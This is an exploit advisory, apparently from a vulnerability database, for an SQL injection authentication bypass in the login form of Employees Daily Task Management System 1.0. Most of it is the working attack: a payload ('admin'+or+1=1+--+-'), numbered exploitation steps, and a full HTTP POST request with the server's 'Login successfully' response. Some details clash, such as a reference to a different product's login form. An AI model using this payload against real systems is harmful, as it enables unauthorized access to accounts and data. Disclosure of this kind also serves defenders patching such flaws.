Employees Daily Task Management System 1.0 SQL Injection

2021.12.09
Credit: able403
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass # Exploit Author: able403 # Date: 08/12/2021 # Vendor Homepage: https://www.sourcecodester.com/php/15030/employee-daily-task-management-system-php-and-sqlite-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip # Version: 1.0 # Tested on: windows 10 # Vulnerable page: Actions.php # VUlnerable parameters: "username" Technical description: An SQL Injection vulnerability exists in theEmployees Daily Task Management System admin login form which can allow an attacker to bypass authentication. Steps to exploit: 1) Navigate to http://localhost/login.php 2) Insert your payload in the user or password field 3) Click login Proof of concept (Poc): The following payload will allow you to bypass the authentication mechanism of the Engineers Online Portal login form - 123'+or+1=1+--+- --- POST /Actions.php?a=employee_login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 43 Origin: http://edtms.com Connection: close Referer: http://edtms.com/login.php Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl email=admin'+or+1=1+--+-&password=123123213 response HTTP/1.1 200 OK Date: Wed, 10 Nov 2021 02:23:38 GMT Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02 X-Powered-By: PHP/8.0.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 48 {"status":"success","msg":"Login successfully."} ---


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top